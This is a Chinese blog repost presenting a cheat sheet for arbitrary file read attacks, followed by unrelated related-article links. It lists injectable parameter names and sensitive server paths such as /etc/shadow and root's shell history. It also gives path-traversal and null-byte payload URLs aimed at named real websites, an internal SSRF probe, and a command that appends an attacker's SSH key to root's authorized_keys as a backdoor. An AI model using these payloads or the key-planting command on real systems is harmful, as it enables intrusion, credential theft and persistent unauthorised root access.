任意文件读取

Posted 2020-10-24 DrKang

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了任意文件读取相关的知识，希望对你有一定的参考价值。

转自http://blog.csdn.net/cd_xuyue/article/details/50560259

敏感字段

&RealPath=
&FilePath=
&filepath=
&Path=
&path=
&inputFile=
&url=
&urls=
&Lang=
&dis=
&data=
&readfile=
&filep=
&src=
&menu=
META-INF
WEB-INF

可利用路径

/etc/shadow
/etc/passwd
/etc/hosts
/root/.bash_history 找user add，cd，mysql，ssh，nohop看敏感目录和文件等
/etc/syscomfig/network-scripts/ifcfg-eth1
sed -i ‘/95_251/d’ /root/.ssh/authorized_keys
url=file:///etc/passwd
url=http://10.29.5.24(ssrf内网探测)
/opt/nginx/conf/nginx.conf
file:///,gopher://,ftp://
/configs/database.php

Payload

http://...:8080/%c0%ae/WEB-INF/classes/com/huilan/application/action/PeopleBankAction.class
配合截断规则：/etc/passwd%00.jpg
../../../../../../../../../../etc/passwd%00.jpg
http://www.zzvcom.com/cms/interface.jsp?time=41&data={readfile:%27/WEB-INF/classes/jdbc.properties%27}&jsoncallback=jsonp1442909681355
http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://www.intime.com.cn:8000/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
echo ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEA0jrJeJfEURdpG/jddXzk3zZYxQfdHbgPC4QYh5qx0F2SS1Q+uCW6j2cM/SxqhocfgDYw1CTikNTlJ43tzv1ozpSRjmLH26aTxGDUnXsvyVLeWdrjPni1FoVffW+LM0rZVh7A74Vi1bDr7IP7XjSMQU157rye7++G+eWA1NhscIiiJ/pwUKAjPSiEx+8DXN8ccTDyWrSnD+NfUQXPO4dVFu2MR5/VjLO2yWsVMwenCPwItf5xEwGqU5KbzxeTOyDnYYLk7UF6lBYpSDZC9U3mNL1alYgNnIbmZGYg921KFh28BRptDewh5MRDKmfMUSqeZpIZ95Pq8lG1sObcjNzDew== [email protected]_251.easou.com >> /root/.ssh/authorized_keys

以上是关于任意文件读取的主要内容，如果未能解决你的问题，请参考以下文章

代码审计两个任意文件读取漏洞实例

[代码审计]Weiphp5.0 前台文件任意读取分析

python 读取文档并创建任意多的list

Linux c读取任意大小文件的所有数据

java读取项目根路径下和任意磁盘位置下的properties文件